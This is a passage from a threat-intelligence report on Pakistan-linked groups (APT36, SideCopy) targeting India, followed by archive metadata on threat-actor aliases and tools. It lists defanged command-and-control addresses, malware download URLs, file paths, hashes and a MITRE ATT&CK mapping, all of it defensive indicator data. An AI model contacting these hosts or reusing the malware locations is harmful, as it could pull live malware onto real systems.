36\n\ndipl[.]site 151.106.117[.]91\r\ncampusportals[.]in 192.64.117[.]203\r\nmazagondoc[.]com\r\nslidesfinder[.]com\r\nC2 and Ports\r\ncheckdailytips.servehttp[.]com/dailyworkout\r\ndefender[.]windowupdatecache[.]in/\r\n172.67.128[.]127:80 \r\n84.247.170[.]237:4858\r\n64.188.27[.]144:5863\r\nhxxp://vocport[.]com/Contactus\r\nhxxp://vocport[.]com/khalistanLeaderprotest\r\nhxxp://149.28.95[.]195/dakshf_upload.php\r\nhxxps://googleservices[.]live/dakshf_upload.php\r\nURLs\r\nhxxps://campusportals[.]in/files/documents/bs/economy/\r\nhxxps://campusportals[.]in/files/documents/bs/economy/1.hta\r\nhxxps://campusportals[.]in/files/documents/bs/economy/2.hta\r\nhxxps://campusportals[.]in/files/documents/bs/it/\r\nhxxps://campusportals[.]in/files/documents/bs/it/1.hta\r\nhxxps://campusportals[.]in/files/documents/bs/it/2.hta\r\nhxxps://campusportals[.]in/files/documents/bs/survey/\r\nhxxps://campusportals[.]in/files/documents/bs/survey/1.hta\r\nhxxps://campusportals[.]in/files/documents/bs/survey/2.hta\r\nhxxps://campusportals[.]in/files/2.hta\r\nhxxps://campusportals[.]in/files/documents/bs/2.hta\r\nhxxps://campusportals[.]in/files/documents/xmlnsprcs.hta\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 31 of 36\n\nhxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/binastos10/\r\nhxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/binastos10/newpictures.png\r\nhxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/Salary_Increment_FY_2024.zip\r\nhxxps://dipl[.]site/Content/2022-23/01/03/\r\nhxxps://dipl[.]site/Content/2022-23/01/03/Imge12542.hta\r\nhxxps://dipl[.]site/Content/2022-23/01/04/WhatsApp_Image_2024-05-06.zip\r\nhxxps://dipl[.]site/Content/2022-23/01/01/\r\nhxxps://dipl[.]site/Content/2022-23/01/01/ugt254d.hta\r\nhxxps://dipl[.]site/Content/2022-23/01/02/US_China_standoff-Opportunity-for-India-Chadha-21-Aug-23.zip\r\nhxxps://slidesfinder[.]com/free-templates/freefiles/158/08978.png\r\nhxxps://slidesfinder[.]com/free-templates/freefiles/158/Letter002.pdf\r\nhxxps://slidesfinder[.]com/free-templates/freefiles/158/rt12.png\r\nhxxps://slidesfinder[.]com/free-templates/freefiles/158/rtloki.png\r\nhxxps://slidesfinder[.]com/free-templates/freefiles/158/tmps.dotm\r\nhxxps://mazagondoc[.]com/documents01/001doc.pdf\r\nhxxps://mazagondoc[.]com/documents01/08978.png\r\nhxxps://mazagondoc[.]com/documents01/Filezilla.exe\r\nhxxps://mazagondoc[.]com/documents01/Letter002.pdf\r\nhxxps://mazagondoc[.]com/documents01/rt12.png\r\nhxxps://mazagondoc[.]com/documents01/sigthief.py\r\nhxxps://mazagondoc[.]com/images/AdobeArm.exe\r\nhxxps://mazagondoc[.]com/images/AdobeReader.bat\r\nhxxps://mazagondoc[.]com/images/Chromes.exe\r\nhxxps://mazagondoc[.]com/images/awccs.bat\r\nhxxps://mazagondoc[.]com/images/igfxtk.bat\r\nhxxps://mazagondoc[.]com/images/igfxtk.exe\r\nhxxps://mazagondoc[.]com/images/msedg.bat\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 32 of 36\n\nhxxps://mazagondoc[.]com/images/msedg.exe\r\nhxxps://mazagondoc[.]com/images/msedgprefix.exe\r\nhxxps://mazagondoc[.]com/images/sigthief.py\r\nhxxps://mazagondoc[.]com/images/pdf/Naval_Projects_Payment_section_Report_29092023.docx\r\nhxxps://mazagondoc[.]com/images/pdf/cheexe.exe\r\nhxxps://mazagondoc[.]com/images/templates/Aerospace.dotm\r\nhxxps://mazagondoc[.]com/images/templates/Naval_Projects_Payment_section_Report_131023.docx\r\nhxxps://mazagondoc[.]com/images/templates/Slide7.png\r\nhxxps://mazagondoc[.]com/images/templates/logo.png\r\nhxxps://mazagondoc[.]com/images/templates/propritery/doc-logo.png\r\nhxxps://mazagondoc[.]com/images/word/Naval_Projects_Payment_section_Report_131023.docx\r\nhxxps://mazagondoc[.]com/images/word/Project_and_Services_Section_report_10102023.docx\r\nHost\r\nC:\\Windows\\Tasks\\useH.hta\r\nC:\\Windows\\Tasks\\useT.hta\r\nC:\\Windows\\Tasks\\alphaT.hta\r\nC:\\Windows\\Tasks\\appH.bat\r\nC:\\Windows\\Tasks\\appT.bat\r\nC:\\Windows\\Tasks\\user01.bat\r\nC:\\Windows\\Tasks\\user02.bat\r\nC:\\ProgramData\\VSUpdates\\svirbre.exe\r\nC:\\Users\\user\\AppData\\Roaming\\AdobeArm.exe\r\nC:\\Users\\user\\AppData\\Local\\PrintsLogs\\Postgres.exe\r\nC:\\Users\\Public\\BroadCastHUB\\DUser.dll\r\nAPT36\r\nf264ed8c76b1102ea55d73d931ab879b survey1.zip\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 33 of 36\n\n6065407484f1e22e814dfa00bd1fae06 PCBL_05_25_JUNE_2024_IPs Consolidation.pdf.desktop\r\nbdde8c9948142fafeec00d7094ae964f LTC_checklist.desktop\r\nbd9de1f98e8797926ab0fc9f2c6ca888 posting Transfer under Ph-III of rotational transfer.desktop\r\n8b5bf198e4948d4fe6a4b0402f7246e5 IAFT-1715.zip\r\n2bf596603c432fa46b494dc3edd2d30f GTK-Theme-Parse.txt\r\n3a65fbc14bd7ff12cda97282935eefd8 Internet usage Survey Form_protected.pdf (decoy)\r\nELF\r\n4eaa6a69c9835c29ce8d39734e5d3d5f Password (Golang Downloader)\r\n4c52bb770d7b8639e1f305f908dbc800 vmcoreinfo.txt (DISGOMOJI)\r\nPoseidon\r\nc5ef19c97462e791f21c32931975dc7b distro-dlna\r\nb2d407d569e4b21ff12736dbc434577f cjs-bin\r\n12aef7e734fb872f9160a1c2a47326d5 bin-xdg\r\n7d6373d9f9a4270bd8af53f3861d7a9c acpid-dit\r\nIPs\r\n165.22.221[.]71\r\n178.128.166[.]148\r\n152.42.162[.]105\r\n161.35.207[.]209\r\n159.65.146[.]80\r\n157.245.100[.]177\r\nPoseidon\r\nURLs\r\nhxxps://campusportals[.]in/myfiles/bdocuments/survey1.zip\r\n165.22.221[.]71/distro-dlna\r\n178.128.166[.]148/cjs-bin\r\n159.65.146[.]80/bin-xdg\r\n157.245.100[.]177/acpid-dit\r\nhxxps://drive.google[.]com/file/d/1p9rewZLjJ3WUdmj_As6el9G5IPNtkEUN/view?usp=sharing\r\nhxxps://drive.google[.]com/file/d/1cAPvjfakAWIHVa_cZXw_iwLDqsIi1uRX/view?usp=sharing\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 34 of 36\n\nhxxps://drive.google[.]com/file/d/1cIxWwVrhS4L6EHiDKc8Ua86NtciC4Njx/view?usp=sharing\r\nhxxps://drive.google[.]com/uc?export=download\u0026id=1dlI8jSabaeJT1MnQxiih0Ww-hZrG-GAe\r\nhxxps://drive.google[.]com/uc?export=download\u0026id=1XvW8ir8l0G9axv4lhEvQFOxOyzmMV64t\r\nhxxps://drive.google[.]com/uc?export=download\u0026id=1btUsB3nWehTNW8Cho9Wv3Efrt4c6EhI_\r\nfikumatry@gmail[.]com\r\nfitfalcon0900@gmail[.]com\r\nMITRE ATT\u0026CK\r\nTactic Technique ID Name\r\nResource Development\r\nT1583.001\r\nT1584.001\r\nT1587.001\r\nT1588.001\r\nT1588.002\r\nT1608.001\r\nT1608.005\r\nAcquire Infrastructure: Domains\r\nCompromise Infrastructure: Domains\r\nDevelop Capabilities: Malware\r\nObtain Capabilities: Malware\r\nObtain Capabilities: Tool\r\nStage Capabilities: Upload Malware\r\nStage Capabilities: Link Target\r\nInitial Access\r\nT1566.001\r\nT1566.002\r\nPhishing: Spear phishing Attachment\r\nPhishing: Spear phishing Link\r\nExecution\r\nT1106\r\nT1129\r\nT1059\r\nT1047\r\nT1204.001\r\nT1204.002\r\nNative API\r\nShared Modules\r\nCommand and Scripting Interpreter\r\nWindows Management Instrumentation\r\nUser Execution: Malicious Link\r\nUser Execution: Malicious File\r\nPersistence\r\nT1053.003\r\nT1547.001\r\nT1547.013\r\nScheduled Task/Job: Cron\r\nRegistry Run Keys / Startup Folder\r\nBoot or Logon Autostart Execution: XDG Autostart Entries\r\nDefense Evasion\r\nT1027.010\r\nT1036.005\r\nT1036.007\r\nT1140\r\nT1218.005\r\nT1574.002\r\nT1027.009\r\nT1027.010\r\nCommand Obfuscation\r\nMasquerading: Match Legitimate Name or Location\r\nMasquerading: Double File Extension\r\nDeobfuscate/Decode Files or Information\r\nSystem Binary Proxy Execution: Mshta\r\nHijack Execution Flow: DLL Side-Loading\r\nObfuscated Files or Information: Embedded Payloads\r\nObfuscated Files or Information: Command Obfuscation\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 35 of 36\n\nDiscovery\r\nT1012\r\nT1016\r\nT1033\r\nT1057\r\nT1082\r\nT1083\r\nT1518.001\r\nQuery Registry\r\nSystem Network Configuration Discovery\r\nSystem Owner/User Discovery\r\nProcess Discovery\r\nSystem Information Discovery\r\nFile and Directory Discovery\r\nSoftware Discovery: Security Software Discovery\r\nCollection\r\nT1005\r\nT1056.001\r\nT1074.001\r\nT1119\r\nT1113\r\nT1125\r\nData from Local System\r\nInput Capture: Keylogging\r\nData Staged: Local Data Staging\r\nAutomated Collection\r\nScreen Capture\r\nVideo Capture\r\nCommand and Control\r\nT1105\r\nT1571\r\nT1573\r\nT1071.001\r\nIngress Tool Transfer\r\nNon-Standard Port\r\nEncrypted Channel\r\nApplication Layer Protocol: Web Protocols\r\nExfiltration\r\nT1020\r\nT1041\r\nT1567\r\nAutomated Exfiltration\r\nExfiltration Over C2 Channel\r\nExfiltration Over Web Service\r\nAuthor: Sathwik Ram Prakki\r\nSource: https://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 36 of 36", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/" ], "report_names": [ "umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india" ], "threat_actors": [ { "id": "414d7c65-5872-4e56-8a7d-49a2aeef1632", "created_at": "2025-08-07T02:03:24.7983Z", "updated_at": "2026-04-10T02:00:03.76109Z", "deleted_at": null, "main_name": "COPPER FIELDSTONE", "aliases": [ "APT36 ", "Earth Karkaddan ", "Gorgon Group ", "Green Havildar ", "Mythic Leopard ", "Operation C-Major ", "Operation Transparent Tribe ", "Pasty Draco ", "ProjectM ", "Storm-0156 " ], "source_name": "Secureworks:COPPER FIELDSTONE", "tools": [ "CapraRAT", "Crimson RAT", "DarkComet", "ElizaRAT", "LuminosityLink", "ObliqueRAT", "Peppy", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "187a0668-a968-4cf0-8bfd-4bc97c02f6dc", "created_at": "2022-10-27T08:27:12.955905Z", "updated_at": "2026-04-10T02:00:05.376527Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [ "SideCopy" ], "source_name": "MITRE:SideCopy", "tools": [ "AuTo Stealer", "Action RAT" ], "source_id": "MITRE", "reports": null }, { "id": "403c7091-ccdd-4a76-94ad-27eb61449336", "created_at": "2024-01-18T02:02:34.407633Z", "updated_at": "2026-04-10T02:00:04.829369Z", "deleted_at": null, "main_name": "Operation RusticWeb", "aliases": [], "source_name": "ETDA:Operation RusticWeb", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "fce5181c-7aab-400f-bd03-9db9e791da04", "created_at": "2022-10-25T15:50:23.759799Z", "updated_at": "2026-04-10T02:00:05.3002Z", "deleted_at": null, "main_name": "Transparent Tribe", "aliases": [ "Transparent Tribe", "COPPER FIELDSTONE", "APT36", "Mythic Leopard", "ProjectM" ], "source_name": "MITRE:Transparent Tribe", "tools": [ "DarkComet", "ObliqueRAT", "njRAT", "Peppy" ], "source_id": "MITRE", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "7fc3c743-5f3d-4c30-a388-5937abef3659", "created_at": "2024-06-20T02:02:09.693669Z", "updated_at": "2026-04-10T02:00:04.630596Z", "deleted_at": null, "main_name": "Cosmic Leopard", "aliases": [ "Cosmic Leopard", "Operation Celestial Force" ], "source_name": "ETDA:Cosmic Leopard", "tools": [ "GravityAdmin", "GravityRAT", "HeavyLift" ], "source_id": "ETDA", "reports": null }, { "id": "d0c0a5ea-3066-42a5-846c-b13527f64a3e", "created_at": "2023-01-06T13:46:39.080551Z", "updated_at": "2026-04-10T02:00:03.206572Z", "deleted_at": null, "main_name": "RAZOR TIGER", "aliases": [ "APT-C-17", "T-APT-04", "SideWinder" ], "source_name": "MISPGALAXY:RAZOR TIGER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a4f0e383-f447-4cd6-80e3-ffc073ed4e00", "created_at": "2023-01-06T13:46:39.30167Z", "updated_at": "2026-04-10T02:00:03.280161Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [], "source_name": "MISPGALAXY:SideCopy", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "b584b10a-7d54-4d05-9e21-b223563df7b8", "created_at": "2022-10-25T16:07:24.181589Z", "updated_at": "2026-04-10T02:00:04.892659Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [ "G1008", "Mocking Draco", "TAG-140", "UNC2269", "White Dev 55" ], "source_name": "ETDA:SideCopy", "tools": [ "ActionRAT", "AllaKore", "Allakore RAT", "AresRAT", "Bladabindi", "CetaRAT", "DetaRAT", "EpicenterRAT", "Jorik", "Lilith", "Lilith RAT", "MargulasRAT", "ReverseRAT", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "6b9fc913-06c6-4432-8c58-86a3ac614564", "created_at": "2022-10-25T16:07:24.185236Z", "updated_at": "2026-04-10T02:00:04.893541Z", "deleted_at": null, "main_name": "SideWinder", "aliases": [ "APT-C-17", "APT-Q-39", "BabyElephant", "G0121", "GroupA21", "HN2", "Hardcore Nationalist", "Rattlesnake", "Razor Tiger", "SideWinder", "T-APT-04" ], "source_name": "ETDA:SideWinder", "tools": [ "BroStealer", "Capriccio RAT", "callCam" ], "source_id": "ETDA", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "abb24b7b-6baa-4070-9a2b-aa59091097d1", "created_at": "2022-10-25T16:07:24.339942Z", "updated_at": "2026-04-10T02:00:04.944806Z", "deleted_at": null, "main_name": "Transparent Tribe", "aliases": [ "APT 36", "APT-C-56", "Copper Fieldstone", "Earth Karkaddan", "G0134", "Green Havildar", "Mythic Leopard", "Opaque Draco", "Operation C-Major", "Operation Honey Trap", "Operation Transparent Tribe", "ProjectM", "STEPPY-KAVACH", "Storm-0156", "TEMP.Lapis", "Transparent Tribe" ], "source_name": "ETDA:Transparent Tribe", "tools": [ "Amphibeon", "Android RAT", "Bezigate", "Bladabindi", "Bozok", "Bozok RAT", "BreachRAT", "Breut", "CapraRAT", "CinaRAT", "Crimson RAT", "DarkComet", "DarkKomet", "ElizaRAT", "FYNLOS", "Fynloski", "Jorik", "Krademok", "Limepad", "Luminosity RAT", "LuminosityLink", "MSIL", "MSIL/Crimson", "Mobzsar", "MumbaiDown", "Oblique RAT", "ObliqueRAT", "Peppy RAT", "Peppy Trojan", "Quasar RAT", "QuasarRAT", "SEEDOOR", "Scarimson", "SilentCMD", "Stealth Mango", "UPDATESEE", "USBWorm", "Waizsar RAT", "Yggdrasil", "beendoor", "klovbot", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "c68fa27f-e8d9-4932-856b-467ccfe39997", "created_at": "2023-01-06T13:46:38.450585Z", "updated_at": "2026-04-10T02:00:02.980334Z", "deleted_at": null, "main_name": "Operation C-Major", "aliases": [ "APT36", "APT 36", "TMP.Lapis", "COPPER FIELDSTONE", "Storm-0156", "Transparent Tribe", "ProjectM", "Green Havildar", "Earth Karkaddan", "C-Major", "Mythic Leopard" ], "source_name": "MISPGALAXY:Operation C-Major", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null }, { "id": "173f1641-36e3-4bce-9834-c5372468b4f7", "created_at": "2022-10-25T15:50:23.349637Z", "updated_at": "2026-04-10T02:00:05.3486Z", "deleted_at": null, "main_name": "Sidewinder", "aliases": [ "Sidewinder", "T-APT-04" ], "source_name": "MITRE:Sidewinder", "tools": [ "Koadic" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775439119, "ts_updated_at": 1775826771, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6ad77b985f6bb09a34b6c121621cbbc727001a2a.pdf", "text": "https://archive.orkl.eu/6ad77b985f6bb09a34b6c121621cbbc727001a2a.txt", "img": "https://archive.orkl.eu/6ad77b985f6bb09a34b6c121621cbbc727001a2a.jpg" } }